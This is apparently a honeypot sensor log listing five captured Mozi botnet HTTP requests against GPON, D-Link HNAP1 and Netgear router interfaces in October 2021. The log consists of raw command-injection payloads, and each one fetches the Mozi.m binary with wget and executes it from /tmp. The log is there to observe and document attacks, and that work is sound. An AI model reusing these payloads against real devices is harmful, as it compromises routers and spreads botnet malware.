Mozi's malicious packets found on the sensor. Some are different as the adversary appears to use different command strings to inject the malware.

2021-10-13 15:14:06 from 58.249.9.233
  POST /GponForm/diag_Form?images/ HTTP/1.1
  Host: 127.0.0.1:80
  Connection: keep-alive
  Accept-Encoding: gzip, deflate
  Accept: */*
  User-Agent: Hello, World
  Content-Length: 118

  XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://58.249.9.233:36061/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


2021-10-14 12:35:15 from 120.85.93.71
  POST /HNAP1/ HTTP/1.0
  Host: <my IP address>:80
  Content-Type: text/xml; charset="utf-8"
  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
  Content-Length: 640

  <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


2021-10-15 01:09:51 from 61.53.61.122
  POST /GponForm/diag_Form?images/ HTTP/1.1
  Host: 127.0.0.1:80
  Connection: keep-alive
  Accept-Encoding: gzip, deflate
  Accept: */*
  User-Agent: Hello, World
  Content-Length: 118

  XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://61.53.61.122:48846/Mozi.m+-O+->/tmp/gpon80;s
  
  
2021-10-23 01:54:09 from 125.105.70.109
  GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.105.70.109:44703/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


2021-10-23 16:05:35 from 120.85.114.82
  POST /GponForm/diag_Form?images/ HTTP/1.1
  Host: 127.0.0.1:80
  Connection: keep-alive
  Accept-Encoding: gzip, deflate
  Accept: */*
  User-Agent: Hello, World
  Content-Length: 118

  XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+
